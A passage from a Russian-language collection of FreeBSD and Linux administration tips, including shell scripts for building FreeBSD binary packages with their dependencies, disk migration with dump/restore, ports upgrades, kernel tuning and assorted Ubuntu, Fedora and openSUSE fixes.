По сути, выполняет действия, аналогичные pkg_create с ключём -R, который появился только в FreeBSD 6.x. Однако данный скрипт позволяет указывать короткое имя порта и каталог, в котором создавать пакеты. А главное, он работает и на тех системах, где pkg_create не поддерживает ключ -R. #!/bin/sh # # pkg_depend # Create all packages (with dependence) needed by some port for FreeBSD 5.x+ # # Version: 1.4 # Copyright (c) 2005,2006 Alexey Tsvetnov, vorakl@fbsd.kiev.ua # # Path to packages directory pkgpath="/usr/ports/packages/All" # Command for get package's version pkgvercmd="pkg_version -v" #pkgvercmd="portversion -v" # more faster than pkg_version getdepend() { [ ! -d $2 ] && echo -n "Creating directory ($2)..." && mkdir -p $2 && echo "Done." cd ${pkgpath} if [ ! -f ${pkgpath}/$1.tbz ]; then echo -n "Creating package ($1)..." pkg_create -yb $1 echo "Done." fi echo -n "Copying package ($1)..." cp -f ${pkgpath}/$1.tbz $2 echo "Done." for LINE in `pkg_info -r $1 | grep Dependency\: | awk '{print $2}'` do if [ ! -f ${pkgpath}/${LINE}.tbz ]; then echo -n "Creating package (${LINE})..." pkg_create -yb ${LINE} echo "Done." fi echo -n "Copying package (${LINE})..." cp -f ${pkgpath}/${LINE}.tbz $2 echo "Done." done } gethelp() { echo "" echo "Usage: `basename $0` <Full/Short pkg_name> <Directory>" echo "" echo "If specify short package name script will get first find entry" echo "" echo "Example: `basename $0` dia-gnome-0.94_4,1 /tmp/pkg/" echo " `basename $0` dia-gnome /tmp/pkg/" echo "" exit 1 } main() { if [ "$2" = "" ]; then gethelp else echo -n "Checking package name ($1)..." if [ "`echo $1 | grep '\-[0-9]'`" = "" ]; then pkgname=`${pkgvercmd} | grep -E '^'$1'-[0-9].*' | awk '{print $1}' | head -1` else pkgname=`${pkgvercmd} | grep $1 | awk '{print $1}' | head -1` fi echo "Done." if [ "${pkgname}" = "" ]; then echo "Package '$1' not found! Exit." exit 2 else getdepend ${pkgname} $2 fi fi } main $1 $2 exit 0

Скрипт для автоматизации создания бинарных пакетов для FreeBSD Автор: Alexey Tsvetnov [комментарии]

#!/bin/sh # # Create all packages with sym-links for FreeBSD 5.x+ # # Version: 1.2.2 # Copyright (c) 2006 Alexey Tsvetnov, vorakl@fbsd.kiev.ua # # All error in /var/log/<script_name>.err # # Path to packages directory packagespath="/usr/ports/packages" # Command for get package's version pkgvercmd="/usr/sbin/pkg_version -v" #pkgvercmd="/usr/local/sbin/portversion -v" # more faster than pkg_version #------------------------------------------------------------------------------- err="\033[0;40;31mError\033[0m" ok="\033[1;40;33mOk\033[0m" checkPackagesPath () { [ -d $packagespath ] || { /usr/bin/printf " *** $err: $packagespath doesn't exist.\n"; /bin/echo " *** Error: $packagespath doesn't exist." > /var/log/`basename $0`.log; exit 1; } [ -d $packagespath/All ] || { /bin/mkdir $packagespath/All || exit 1; } [ -d $packagespath/Latest ] || { /bin/mkdir $packagespath/Latest || exit 1; } return 0 } checkPkgAll () { [ -f $packagespath/All/$fullname.tbz ] && return 0 return 1 } checkPkgLatest () { [ -L $packagespath/Latest/$shortname.tbz ] && [ -r $packagespath/Latest/$shortname.tbz ] && return 0 return 1 } checkPkgCat () { [ -L $packagespath/$subdir/$fullname.tbz ] && [ -r $packagespath/$subdir/$fullname.tbz ] && return 0 return 1 } createPkgAll () { /usr/sbin/pkg_create -jb $fullname $packagespath/All/$fullname.tbz && return 0 return 1 } createPkgLatest () { /bin/rm -f $packagespath/Latest/$shortname.tbz cd $packagespath/Latest && /bin/ln -s ../All/$fullname.tbz $shortname.tbz && return 0 return 1 } createPkgCat () { if [ -d $packagespath/$subdir ]; then /bin/rm -f $packagespath/$subdir/$fullname.tbz else /bin/mkdir -p $packagespath/$subdir fi cd $packagespath/$subdir && /bin/ln -s ../All/$fullname.tbz $fullname.tbz && return 0 return 1 } getPkgFullVersion () { echo -n "Geting full version package list..." pkglist=`$pkgvercmd | /usr/bin/awk '{print $1}'` /usr/bin/printf "$ok\n" } work () { for fullname in $pkglist; do /bin/echo "Check $fullname" shortname=`/bin/echo $fullname | /usr/bin/sed 's/\-[^-]*$//'` subdir=`/usr/sbin/pkg_info -o $fullname | /usr/bin/sed -e '1,3d' -e '$d' | /usr/bin/awk -F/ '{print $1}'` if ! checkPkgAll; then /bin/echo -n " ==> Create package..." if createPkgAll; then /usr/bin/printf "$ok\n" else /usr/bin/printf "$err\n" fi /bin/echo -n " ==> Create Latest sym-link..." if createPkgLatest; then /usr/bin/printf "$ok\n" else /usr/bin/printf "$err\n" fi /bin/echo -n " ==> Create Category sym-link..." if createPkgCat; then /usr/bin/printf "$ok\n" else /usr/bin/printf "$err\n" fi continue fi if ! checkPkgLatest; then /bin/echo -n " ==> Create Latest sym-link..." if createPkgLatest; then /usr/bin/printf "$ok\n" else /usr/bin/printf "$err\n" fi fi if ! checkPkgCat; then /bin/echo -n " ==> Create Category sym-link..." if createPkgCat; then /usr/bin/printf "$ok\n" else /usr/bin/printf "$err\n" fi fi done } main () { exec 2>/var/log/`basename $0`.log checkPackagesPath getPkgFullVersion work exec 2>&- } main exit 0

Создаем из 2х установочных CD с FreeBSD 5.4 - один DVD. (доп. ссылка 1) Автор: JackSoft [комментарии]
Вот тут надоело шаманство со сменой СD при инсталляции очередной FreeBSD 5.4 и было решено создать инсталляционный DVD - быстро и все в одном. Сразу оговорюсь - все манипуляции с ISO-образами проводились с помощью UltaISO 7.2.3.906.
Все началось с того что я сравнил файлы INDEX в папках /packages на обоих CD и нашел их полную идентичность. Позже, изучив их содержимое, определил что за номер диска на котором находится установочный пакет отвечает последняя цифра в строке, которую честно поменял на 1.
После чего все файлы с CD 2 (кроме cdrom.inf) были полностью перенесены в ISO образ CD 1 и в /packages записан патченный (см. выше) файл INDEX. Записываем ISO и получаем то что нам нужно - инсталяционный DVD.
Я пошел дальше. С папки /5.4-STABLE-SNAP006/ports (я на этом снепшопе делал) достал архив (tar/gz) ports.tgz, распаковал его и в директорию /ports/distfiles закинул последние скачанные порты (кидал самое необходимое при установке без доступа в Инет - например, Midnight Commander), опять сжал архив и положил его на место в ISO-образе. Теперь порты распаковываются при установке вместе с моими distfiles...

Перенос системы FreeBSD на новый жёсткий диск. (доп. ссылка 1) Автор: LM [комментарии]

По ссылке приведён удачный метод переноса FreeBSD на новый жёсткий диск произвольного размера. Вкратце это делается так: 1. Подключаем новый жёсткий диск в систему с FreeBSD (/dev/ad1s1) 2. С помощью /stand/sysinstall разбиваем новый диск на разделы так же как это сделано на старом. То есть чтобы /dev/ad0s1a соответствовал /dev/ad1s1a - размер /dev/ad1s1a может быть большем чем на /dev/ad0s1a. 3. Создаём временные папку и подпапки: mkdir /backup mkdir /backup/root mkdir /backup/usr mkdir /backup/var mkdir /backup/tmp 4. Загружаемся в single user 5. Монтируем разделы: при sysinstall иногда дополнительно требуется: newfs /dev/da1s1e # Повторяем этот шаг для всех созданных разделов. mount /dev/ad1s1a /backup/root mount /dev/ad1s1e /backup/var mount /dev/ad1s1f /backup/usr (тут указываем свои) 6. Переносим систему: ( dump -0f - / ) | ( cd /backup/root ; restore -rf - ) ( dump -0f - /var ) | ( cd /backup/var ; restore -rf - ) ( dump -0f - /usr ) | ( cd /backup/usr ; restore -rf - ) 7. Размонтируем umount /backup/root umount /backup/var umount /backup/usr 8. Включаем Soft Updates tunefs -n enable /dev/ad1s1a tunefs -n enable /dev/ad1s1e tunefs -n enable /dev/ad1s1f Всё теперь можно с чистой совестью убрать из системы старый жёсткий диск, а на его место поставить новый.

Как создать INDEX файл после обновления коллекции портов в последних версиях FreeBSD [комментарии]

Скачать индексный файл: cd /usr/ports make fetchindex Или сгенерировать с нуля: make index (работает очень долго).

Сборка FreeBSD портов другой версией GCC [комментарии]

Во FreeBSD 5.3 используется GCC-3.4.2, некоторые программы в портах в связи с этим перестали нормально собираться. В некоторых портах появились соответсвующие записи: BROKEN="Does not compile with gcc 3.4.2" Для решения проблемы можно попробовать откомпилировать другой версией gcc, например, lang/gcc295. Исправить Makefile, закомментировав BROCKEN и устанавливать: csh: # setenv CC /usr/local/bin/gcc295 && make install clean bash: # export CC=/usr/local/bin/gcc295 && make install clean

Особенности установки Tomcat 5.0 под FreeBSD 5.2 Автор: Александр Елисеенко [комментарии]

Итак, при построении jdk 1.4.2 из портов необходимо иметь разрешение эмуляции Linux в ядре и монтированную файловую систему linprocfs. Для этого в файле /etc/rc.conf необходимо указать # linux_enable="YES" а в файле /etc/fstab # linprocfs /compat/linux/proc linprocfs rw 0 0 По завершении установки необходимо установить переменную окружения JAVA_HOME, которая указывает на каталог с установленным jdk Соответственно, в файле .cshrc необходимо добавить # setenv JAVA_HOME /usr/local/jdk1.4.2 а в файле .profile # export JAVA_HOME=/usr/local/jdk1.4.2 Установка Tomcat 5.0 из портов проблем не вызвала, но запуск программы постоянно срывался. Изучение логов показало, что Tomcat пытался работать с протоколом IPv6, который не был установлен в моей системе. В соответствии с рекомендацией, данной в логах, делаем запрет на IPv6 # sysctl net.inet6.ip6.v6only=0 теперь все работает. Как вариант, можно внести соответствующие изменения в catalina.sh и сделать запуск java с ключем -Djava.net.preferIPv4Stack=true, но через sysctl мне показалось проще.

Как осуществить разбивку диска в FreeBSD Автор: lavr [комментарии]

Создать freebsd слайс и прописать стандартный загрузчик: fdisk -BI -v -b /boot/mbr ad0 disklabel -w -r -B -b /boot/boot1 -s /boot/boot2 ad0s1 auto или проще disklabel -w -B ad0s1 auto Затем руками отредактировать разбивку: disklabel -e -r ad0s1 с нужными размерами newfs , затем "tunefs -n enable раздел" если нужно softupdate

Почему после обновления FreeBSD 4.x некоторые программы перестали запускаться [обсудить]

Например для устранения ошибки: /usr/libexec/ld-elf.so.1: /usr/lib/libm.so.2: Undefined symbol: "__stderrp" В /etc/make.conf добавьте COMPAT3X=YES COMPAT4X=YES cd /usr/src/lib/compat make && make install

Очистка /usr/ports/distfiles от файлов со старыми версиями (доп. ссылка 1) Автор: awk [комментарии]

По ссылке можно найти скрипт, который просматривает список установленных портов и их зависимостей, очищает distfiles от старых версий, оставшихся после обновления портов и запуска portupgrade. Комментарий к заметке: В portupgrade есть специальная утилита для чистки мусора - portsclean.

Как определить порядок запуска rc.d скриптов в FreeeBSD (доп. ссылка 1) Автор: uldus [комментарии]

/usr/local/etc/rc.d скрипты запускаются в алфавитном порядке: 010.postgres.sh 020.postfix.sh 030.apache.sh

Как оптимизировать сборку ядра и системы в FreeBSD [комментарии]

Правим /etc/make.conf пользуясь /etc/defaults/make.conf CPUTYPE=i686 CFLAGS=-O2 -pipe COPTFLAGS=-O -pipe На SMP системах собираем через make -j2 buildworld

Можно ли обойтись в FreeBSD GENERIC ядром или как изменить параметры ядра без его пересборки. [комментарии]

man sysctl.conf; man sysctl man loader.conf; man loader На основе параметров в /boot/defaults/loader.conf, формируем /boot/loader.conf, где можем указать какие модули подгружать и какие значения системных констант использовать. Например, безе пересборки можно использовать GENERIC с /boot/loader.conf: kern.maxusers="512" kern.ipc.nmbclusters="16384" null_load="YES" # Грузим модуль для Null filesystem vinum_load="YES" accf_http_load="YES" # HTTP request accept filter /etc/sysctl.conf kern.maxfiles=32000 kern.ipc.somaxconn=1024 net.inet.ip.portrange.last=30000 net.inet.tcp.sendspace=32768 net.inet.tcp.recvspace=32768

Какие tag'и можно ставить при апгрейде FreeBSD через cvsup (доп. ссылка 1) Автор: lavr [обсудить]

Например для 4.6.1: tag=RELENG_4_6_1_RELEASE для всех RELEASE, к RELENG_X_Y добавляется _RELEASE - это чистый RELEASE для каждого РЕЛИЗА, после установки или upgrade via CVS/CTM, впоследствии можно использовать tag=RELENG_X_Y - который будет вытягивать только security patches для заданного в теге RELEASE для STABLE всегда tag=RELENG_4 , stable всегда изменяется для CURRENT tag=.

Как русифицировать шелл в FreeBSD ? Автор: lavr [обсудить]

Bash: $HOME/.inputrc set convert-meta off set input-meta on set output-meta on $HOME/.bash_profile export CHARSET=KOI8-R export MM_CHARSET=KOI8-R export LANG=ru_RU.KOI8-R Tcsh[Csh] $HOME/.login setenv CHARSET KOI8-R setenv MM_CHARSET KOI8-R setenv LANG ru_RU.KOI8-R

Установка программ через Ports в FreeBSD. [комментарии]

Апргейд коллекции портов: Редактируем /usr/share/examples/cvsup/ports-supfile и запускаем: cvsup -g -L 2 ports-supfile Поиск: make search key="строка" - поиск пакета по ключевому слову. make search name="строка" - поиск пакета по названию пакета. Установка портов: cd /usr/ports/порт; make; make install Другие команды: make deinstall - деинсталлировать приложение. make fetch - скачать приложение из сети. make checksum - проверить контрольные суммы. make depends - перестроить зависимости. make extract - разархивировать исходные тексты в work директорию. make patch - применить патчи к приложению. make build - собрать приложение из исходных тестов. make clean - "почистить" исходники после сборки. make reinstall - переустановить приложение после удаления. make package - построить из порта package.

Где скачать последнюю FreeBSD STABLE в бинарном виде ? (доп. ссылка 1) [комментарии]

ftp://stable.freebsd.org/pub/FreeBSD/snapshots/i386/

Как правильно проабгрейдить установленные FreeBSD ports [комментарии]

pkg_version -c >/tmp/uplist.sh sh -x /tmp/uplist.sh > /tmp/upgrade.output cd /usr/ports/devel/ctags; portupgrade ctags

Как автоматизировать процесс установки FreeBSD на несколько машин. [обсудить]

Для автоматической установки достаточно создать профайл инсталляции install.cfg, скопировать его на дискету, а в sysinstall при установке выбрать пункт меню "Load Config". Пример install.cfg можно найти в /usr/src/release/sysinstall/install.cfg

Как проабгрейдить FreeBSD с помощью cvsup [комментарии]

1. cd /usr/src/; cvsup -g -L2 /etc/cvsupfile # cvsupfile составляем опираясь на /usr/share/examples/cvsup/stable-supfile 2. make buildworld 3. make buildkernel KERNCONF=имя_конфига_ядра 4. make installkernel KERNCONF=имя_конфига_ядра 5. make installworld 6. mergemaster Для пересборки ядра после make installworld: config MYKERNEL; make depend; make; make install Дополнение: C 2012 года проект FreeBSD перешёл на использование Subversion. Вместо cvsup следует использовать svnup (или freebsd-update для системы, portsnap/pkg для портов): cd /usr/ports/net/svnup && make install svnup stable -h svn0.us-west.freebsd.org svnup ports -h svn0.us-west.freebsd.org Настройки можно найти в файле /usr/local/etc/svnup.conf

Если возникла проблема с FreeBSD или нет драйвера для устройства. (доп. ссылка 1) [обсудить]

Неофициальные драйвера устройств и решение некоторых проблем приводятся на http://www.freebsd.org/cgi/query-pr-summary.cgi

Как создать необходимые для проигрывания звука устройства в FreeBSD [комментарии]

cd /dev;./MAKEDEV snd0 будут созданы все необходимые устройства (/dev/dsp, /dev/mixer и т.д.) для pcm0.

Как обновить код загрузчика в FreeBSD [комментарии]

Ставим boot-менеджер в MBR: boot0cfg /dev/ad0 или fdisk -B -b /boot/boot0 /dev/ad0 Обновляем boot-loader (boot1 и boot2): disklabel -B ad0s1

Почему не работает отладчик kbdg в FreeBSD 4.7 Автор: anonym [обсудить]

Я столкнулся с тем, что при установке FreeBSD 4.7 перестал работать отладчик kdbg. Проблема решилась заменой отладчика dbg из дистрибутива на GNU dbg 5.2 (есть в пакаджах)

Linux специфика

Оптимизация и тюнинг в Linux

Увеличение безопасности Linux

Установка и работа с пакетами программ в Linux

Отключение учетной записи root в openSUSE Tumbleweed Автор: popov895 [комментарии]

В этой заметке я не буду объяснять, почему необходимо отключать учетную запись root, а просто опишу, как это можно сделать в openSUSE Tumbleweed. Внимание: не забывайте делать резервные копии системных файлов, которые планируете редактировать! Для начала, нужно добавить пользователя, которому необходимо включить доступ к sudo, в групу wheel (username - имя этого пользователя): sudo usermod -aG wheel username Далее необходимо отредактировать файл /etc/sudoers. Для этого необходимо выполнить следующую команду: sudo visudo Что необходимо отредактировать: * Раскомментировать строку (последняя строка в примере ниже): ## Uncomment to allow members of group wheel to execute any command %wheel ALL=(ALL) ALL * Закомментировать две строки (две последние строки в примере ниже): ## In the default (unconfigured) configuration, sudo asks for the root password. ## This allows use of an ordinary user account for administration of a freshly ## installed system. When configuring sudo, delete the two ## following lines: # Defaults targetpw # ask for the password of the target user i.e. root # ALL ALL=(ALL) ALL # WARNING! Only use this together with 'Defaults targetpw'! * Добавить строку в конец секции Defaults specification (последняя строка в примере ниже): ## ## Defaults specification ## ## Prevent environment variables from influencing programs in an ## unexpected or harmful way (CVE-2005-2959, CVE-2005-4158, CVE-2006-0151) ... Defaults env_keep += "DISPLAY XAUTHORITY" Внесённые изменения нужно сохранить и выйти из редактора (:wq для vim). Далее необходимо изменить правила аутентификации через PolicyKit. Для этого необходимо выполнить следующие две команды: sudo cp /usr/share/polkit-1/rules.d/50-default.rules /etc/polkit-1/rules.d/40-default.rules sudo sed -i 's/user:0/group:wheel/g' /etc/polkit-1/rules.d/40-default.rules Далее нужно настроить kdesu на использование sudo вместо su. Для этого нужно создать файл /etc/xdg/kdesurc со следующим содержимым: [super-user-command] super-user-command=sudo После всего этого перезагружаемся и, собственно, теперь уже отключаем учетную запись root: sudo passwd -l root

Полезные пакеты, которые можно установить на сервер для диагностики сбоев (доп. ссылка 1) [комментарии]

Минимальный набор пакетов для диагностики проблем, которые рекомендуется заранее установить на серверы, чтобы не тратить время на установку дополнительных пакетов или поиск специализированных live-дистрибутивов. Установка диагностических утилит во время сбоя может превратиться в решение отдельной проблемы или потребовать много времени, учитывая то, что во время сбоя может пропадать сетевое соединение, возникнуть проблемы с DNS, наблюдаться большие потери пакетов или снижение полосы пропускания, возникать большие задержки ввода команд из-за высокой нагрузки на CPU или исчерпания памяти, дисковый раздел может быть переведён в режим только для чтения и т.п. Список пакетов для предустановки (названия для Ubuntu) и поставляемые в них диагностические утилиты:
procps - утилиты ps, vmstat, uptime, top
util-linux - dmesg, lsblk, lscpu (общая статистика, информация о блочных устройствах и CPU)
sysstat - iostat, mpstat, pidstat, sar (оценка производительности)
iproute2 - ip, ss, nstat, tc (настройка сети и управление трафиком)
numactl - numastat (статистика по NUMA)
tcpdump - tcpdump (анализ трафика)
linux-tools-common и linux-tools-$(uname -r) - perf, turbostat (профилировние и мониторинг производительности)
bpfcc-tools (bcc) - opensnoop, execsnoop, runqlat, softirqs, hardirqs, ext4slower, ext4dist, biotop, biosnoop, biolatency, tcptop, tcplife, trace, argdist, funccount, profile (диагностика на базе eBPF)
bpftrace - bpftrace, opensnoop, execsnoop, runqlat, biosnoop (диагностика на базе eBPF)
trace-cmd - trace-cmd (CLI-интерфейс для ftrace)
nicstat - nicstat (информация о сетевых устройствах)
ethtool - ethtool (информация о сетевых устройствах)
tiptop - tiptop (PMU/PMC top)
cpuid - cpuid (информация о CPU)
msr-tools - rdmsr, wrmsr (информация о CPU) sudo apt install procps util-linux sysstat iproute2 numactl tcpdump linux-tools-common linux-tools-$(uname -r) bpfcc-tools bpftrace trace-cmd nicstat ethtool tiptop cpuid msr-tools

Загрузка ядра Linux, собранного в конфигурации allmodconfig Автор: linuxoid [комментарии]

Файл конфигурации allmodconfig позволяет все модули ядра отметить как "m", т.е. как подгружаемые, а не встроенные в ядро. Но проблема в том, что ядро с такими настройками не загружается. Подразумевается, что в файле конфигурации уже отмечены все подходящие для заданного компьютера дисковые драйверы sata/ide/scsi, как встроенные в ядро "y" или как "m" для размещения на initrd. Но ядро всё равно не грузится. Загрузочное сообщение: Cannot open root device "(null)" Если в grub указан параметр root=/dev/sda1 (sda1 указан для примера), а при при загрузке появляется сообщение "Cannot open root device "(null)" or unknown-block(0,0)" (обратите внимание, что вместо sda1 появилось null), это значит, что нужно изменить в конфигурации "CONFIG_CMDLINE_BOOL=n". Загрузочное сообщение: Failed to execute /init При использовании initrd при загрузке может появится сообщение "Failed to execute /init" и нужно изменить в конфигурации "CONFIG_BINFMT_SCRIPT=y".

Обновление Fedora/RFRemix 19 до Fedora/RFRemix 20 Автор: Аноним [комментарии]

Получаем права суперпользователя su Устанавливаем новый gpg-ключ: rpm --import https://fedoraproject.org/static/246110C1.txt Удаляем проблемную прошивку Intel WiMAX, убедившись в том, что подключение посредством WiMAX не является единственным способом соединения устройства с Сетью yum remove NetworkManager-wimax Обновляем систему: yum update yum yum --releasever=20 distro-sync Внимание ! При обновлении с использованием fedup предварительно следует обновить данную утилиту до версии 0.8. В репозиториях Fedora 18 и 19 в момент выхода Fedora 20 находилась версия 0.7, при использовании которой обновление до Fedora 20 будет завершено ошибкой. При обновлении с Fedora 18 дополнительно в fedup следует использовать опцию "--nogpgcheck".

Установка DTrace в Ubuntu Linux (доп. ссылка 1) [комментарии]

Установим пакеты, необходимые для обеспечения работы DTrace: sudo apt-get update && sudo apt-get upgrade sudo apt-get install python-software-properties bison flex build-essential \\ libelf-dev zlib1g-dev libc6-dev-i386 libdwarf-dev binutils-dev sudo apt-get install git Клонируем на локальную систему содержимое Git-репозитория dtrace4linux: git clone git://github.com/ShepBook/dtrace-for-linux.git” Соберём компоненты DTrace: cd dtrace-for-linux make all sudo make install Загрузим модуль ядра с поддержкой DTrace: sudo make load Убедимся, что поддержка DTrace присутствует в ядре: sudo /usr/sbin/dtrace -l Загрузим DTrace-скрипт: sudo /usr/sbin/dtrace -s скрипт.d

Особенности установки Skype на 64-битную систему Автор: Карбофос [комментарии]

При попытке скачать и установить с оригинальной страницы пакет skype 64 для Ubuntu и установить его на базирующуюся на Debian 64-битную платформу меня ждало разочарование: распакованный файл, скачанный здесь http://www.skype.com/go/getskype-linux-beta-ubuntu-64 на поверку оказался обычным 32-битным бинарником: readelf -h ./skype Скачанная здесь http://www.skype.com/go/getskype-linux-beta-static программа собрана статично только с Qt4 библиотеками. Командой ldd ./skype выясняются другие зависимости 32-битных библиотек этой программы. Устанавливаем ia32-libs-gtk из репозитория вашего дистрибутива, например, для Debian-подобных систем: sudo apt-get install ia32-libs-gtk создаём старт-скрипт skype.sh #!/bin/bash # этот вариант для программы с библиотеками Qt4 в директории ~/skype/lib #export LD_LIBRARY_PATH=~/skype/lib:/usr/lib32/:$LD_LIBRARY_PATH # этот вариант с интегрированным Qt4 export LD_LIBRARY_PATH=/usr/lib32/:$LD_LIBRARY_PATH # часть libv4l export LD_PRELOAD=/usr/lib32/libv4l/v4l1compat.so ./skype Если нет реакции при тесте изображения, то можно диагностировать из консоли (с правами доступа): tail -f /var/log/messages при этой ошибке "bandwidth not wide enough - trying again" можно попытаться подключить камеру не через USB Hub, а напрямую к компьютеру. Если происходит крах программы, то можно попытаться настроить свойства камеры в созданном программой файле настроек config.xml в директории ~/.Skype/$acc_name/ : <Video> <CaptureHeight>240</CaptureHeight> <CaptureWidth>320</CaptureWidth>  </Video> Если <Video>..</Video> в файле настроек нет, то его нужно добавить в секции <Lib>..</Lib>. Здесь можно настроить, как видно, частоту кадров и разрешение вебкамеры. Поэкспериментируйте с этими настройками. Ссылки: подключение skype под Linux, для случая с подключением Compiz.

Что поправить в Ubuntu 10.10 Maverick на ноутбуке IBM Т61 Автор: rstone [комментарии]

1. Если нет индикации раскладки клавиатуры (должно быть написано рядом со значком), либо наблюдаются проблемы с индикаторами (внимание , настройки панели будут сброшены - останутся только индикаторы по умолчанию): gconftool-2 --shutdown rm -rf ~/.gconf/apps/panel pkill gnome-panel 2. Если на каждое подключение питания (AC) включается диск на несколько секунд, в логах было : ata3: exception Emask 0x10 SAct 0x0 SErr 0x50000 action 0xe frozen [76550.066188] ata3: irq_stat 0x00400000, PHY RDY changed [76550.066191] ata3: SError: { PHYRdyChg CommWake } [76550.066196] ata3: hard resetting link Выяснилось, что это старая ошибка, исправленная в ядре 2.6.33, но как-то попавшая в 2.6.35-22-generic от Ubuntu. Лечится в файле /usr/lib/pm-utils/power.d/sata_alpm Строчку true) [ "$SATA_ALPM_ENABLE" = true ] && set_sata_alpm min_power;; меняем на : true) [ "$SATA_ALPM_ENABLE" = truelies ] && set_sata_alpm min_power;; баг1 баг2 3. Неработа мышей ( TrackPoint && TouchPad ) и клавиатуры после возвращения из спящего режима. Лечится созданием/редактированием файла /etc/pm/config.d/00sleep_module: cat /etc/pm/config.d/00sleep_module SUSPEND_MODULES="psmouse"

Борьба с kernel panic в Linux-ядре 2.6.35 и выше Автор: Аноним [комментарии]

Начиная с версии 2.6.35 в Linux-ядре появилась полезная функция "ramoops", позволяющая в случае краха сохранять информационный дамп состояния ядра в памяти для последующего анализа. Данные сохраняются только при мягкой перезагрузке, без очистки прошлого состояния памяти. Вкомпилировать данную функцию в ядро или загружать модулем "ramoops" - без разницы. Единственная хитрость - сначала нужно зарезервировать память в ядре. Сделать это можно указав ядру параметр memmap=256K@0xfc0000 (резервируем 256К перед ядром). Если ramoops в ядре, то добавляем параметры ramoops.mem_address=0xfc0000 и ramoops.mem_size=0x40000 параметр ramoops.dump_oops=1 является умолчанием, так что его можно не указывать. Для модуля "ramoops" эти параметры нужно указать при загрузке. Теперь чтобы ядро не осталось в мертвом виде, не забываем сделать echo 10 >/proc/sys/kernel/panic и (если нужно, а иногда полезно) echo 1 >/proc/sys/kernel/panic_on_oops Теперь проверяем при помощи crash-а через Alt-SysRq-C. После перезагрузки, текст crash-дампа будет лежать в памяти, начиная с адреса 0xfc0000. Достать его оттуда можно при помощи dd if=/dev/mem bs=256k skip=63 count=1 >>crash.txt либо при помощи простенькой программы, которая открывает /dev/mem и с указанного смещения читает данные. Для сохранения дампа на диск следует использовать похожую функцию mtdoops. Дополнение: Для работы в ядре необходимо выключить опцию CONFIG_STRICT_DEVMEM

Разбираем nod32 для Linux Автор: Карбофос [комментарии]

Пару дней назад появилась новость о выходе бета версии антивируса для линукс систем. Скачать можно здесь: http://beta.eset.com/linux Мне стало интересно, что внутри этого бинарника и как его можно установить без инсталляции через dpkg или rpm. у меня дома 64 битный Debian, поэтому загрузил себе версию соответствующей разрядности. В директории с загруженным из интернета бинарником: chmod 755 ueav.x86_64.linux После этого бинарник можно запустить, но он сразу хочет пароля суперпользователя для установки. Посмотрим, что он хочет. В директории /tmp/ во время запуска появляется поддиректорий с именем подобным /tmp/epkg.uIS8sc/ Сделаем копию в директорий пользователя, т.к. в случае закрытия дилога с вводом пароля root файлы удалятся, что и следует ожидать. В ESETовском директории можно найти пару интересных файлов, один из которых - бинарник test32 пользователя aurel32. На какой системе он был собран также нетрудно выяснить. Второй файл намного интереснее, это epkg.rpm Вытаскиваем содержимое утилитой rpm2cpio (к примеру) rpm2cpio epkg.rpm | cpio -idv В сожалению, можно обнаружить, что в бинарниках есть жесткая привязка в директорию /opt/ поэтому я решил сделать просто символьные линки на папку, в которую я распаковал (перетащил) содержимое, нужны права суперпользователя. ln -s /home/username/ESET/opt/eset /opt/eset ну и остальные, по желанию. Если не хотите, то можно напрямую перетащить директории с содержимым в корневой каталог. содержимое etc в /etc и далее, по списку. Если сделали, как нужно, то в директории /etc/init.d/ появился скрипт esets, который управляет демоном от eset: ./esets Usage: ./esets {start|stop|restart|force-reload|reload} В распакованном нами директории ~/ESET/opt/eset/esets/lib/ есть файл, размером 20 мегабайт: esets_modules. В нем находятся базы сигнатур, которые распаковываются в обычном случае в /var/opt/eset/esets/lib/, сюда же следует обновлять данные антивируса вручную, если не будет работать актуализация. В случае, если при старте из консоли вы будете получать сообщение, типа "нет прав...", то можно пойти навстречу требованиям трудящихся: chown username:users /opt/eset/ -R chown username:users /var/log/esets -R chown username:users /var/opt/eset -R chown username:users /etc/opt/eset -R затем запускаем демон /etc/init.d/esets force-reload и после этого GUI: /opt/eset/esets/bin/esets_gui определить разрядность исполняемого файла можно так: readelf -h esets_gui загружаемые библиотеки: ldd esets_gui p.s. графическую оболочку для установки не запускал вообще, уж извините.

Безопасная перезагрузка зависшей системы Linux через Magic SysRq key (доп. ссылка 1) Автор: Litos [комментарии]

Иногда бывает, что операционная система Linux зависает. Вы пробудете перезапустить Иксы нажав Ctrl+Alt+BackSpace (следует отметить, что данная комбинация отключена по-умолчанию в новом XOrg), но это безрезультатно. Зайти на машину по сети тоже нет возможности. Но не стоит нажимать кнопку Reset. Ведь это может привести к потери несохраненных данных/повреждению файлов с которыми велась работа. Вместо этого следует нажать комбинацию клавиш Alt+SysRq и удерживая их последовательно нажать клавиши R E I S U B с интервалом 2-3 секунды. После чего система перезагрузится. Запомнить можно комбинацию по фразе: "REстарт ISкуственный UBийственный" Если в консоли нажать Alt+SysRq+H, то можно получить краткую справку.

Выполнение действий при изменении состояния сетевых интерфейсов в Debian (доп. ссылка 1) Автор: ffsdmad [комментарии]

Имеется такая задача, к компьютеру в локальной сети подключается USB WiFi адаптер, при этом компьютер автоматически превращается в прозрачный мост для подключемых WiFi устрайств (ноутбуки). А после отключения адаптера, компьютер должен восстановить своё исходное состояние. В файле /etc/network/interfaces находятся описания настроек интерфейсов, а так же способы запуска Например такая запись, заставляет автоматически включать eth0 и настраивать его по DHCP auto eth0 iface eth0 inet dhcp post-down ip addr flush dev eth0 dhcp # удаляем привязанный IP Для привязки действий в момент подключения или отключения усторойства с заданным именем можно использовать опцию allow-hotplug. Объявляем новое соединение wlan0 и последовательность событий-действий связанных с ним: iface wlan0 inet manual pre-up ifdown eth0 # стопим eth0, нужно для включения его в bridge pre-up brctl addbr bridge pre-up brctl addif bridge eth0 pre-up brctl addif bridge wlan0 pre-up ifconfig eth0 up pre-up dhclient3 bridge pre-up ifconfig wlan0 down pre-up iwconfig wlan0 mode ad-hoc freq 2.437GH essid ffhome channel 6 pre-up ifconfig wlan0 up post-down brctl delif bridge eth0 post-down ifconfig bridge down # стопим bridge, нужно для его удаления post-down brctl delbr bridge post-down ifup eth0 # снова включаем eth0 allow-hotplug wlan0 Опция allow-hotplug инициализирует интерфейс wlan0 в момент когда ядро его определяет. Первое событие происходит перед инициализацией интерфейс. В этот момент нужно остановить eth0, сбросить у него IP, подготовить и запустить мост, а затем иницилизировать WiFi адаптер в режиме точки. А после отключения WiFi адаптера необходимо удалить мост и восстановить eth0.

Добавление драйвера в образ сетевой установки (PXE) CentOS 5.X Автор: Victor Leschuk [обсудить]

